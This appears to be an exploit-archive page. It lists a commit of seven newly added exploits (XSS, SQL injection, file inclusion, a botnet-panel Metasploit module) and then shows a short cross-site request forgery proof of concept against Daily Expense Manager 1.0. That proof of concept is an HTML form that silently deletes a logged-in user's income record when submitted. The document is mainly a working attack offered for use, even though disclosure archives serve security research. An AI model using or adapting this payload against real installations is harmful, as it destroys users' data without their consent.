d82ffc9cd0
7 changes to exploits/shellcodes Baldr Botnet Panel - Arbitrary Code Execution (Metasploit) Open-School 3.0 / Community Edition 2.3 - Cross-Site Scripting Daily Expense Manager 1.0 - Cross-Site Request Forgery (Delete Income) Aptana Jaxer 1.0.3.4547 - Local File inclusion Joomla! Component JS Support Ticket (component com_jssupportticket) 1.1.5 - Arbitrary File Download Adive Framework 2.0.7 - Cross-Site Request Forgery Joomla! Component JS Support Ticket (component com_jssupportticket) 1.1.5 - SQL Injection
18 lines
No EOL
465 B
Text
18 lines
No EOL
465 B
Text
# Exploit Title: Daily Expense Manager - CSRF (Delete Income)
|
|
# Exploit Author: Mr Winst0n
|
|
# Author E-mail: manamtabeshekan@gmail.com
|
|
# Discovery Date: August 8, 2019
|
|
# Vendor Homepage: https://sourceforge.net/projects/daily-expense-manager/
|
|
# Tested Version: 1.0
|
|
# Tested on: Parrot OS
|
|
|
|
|
|
# PoC:
|
|
|
|
<html>
|
|
<body>
|
|
<form action="http://server/homeedit.php?delincome=778" method="post">
|
|
<input type="submit" value="Click!" />
|
|
</form>
|
|
</body>
|
|
</html> |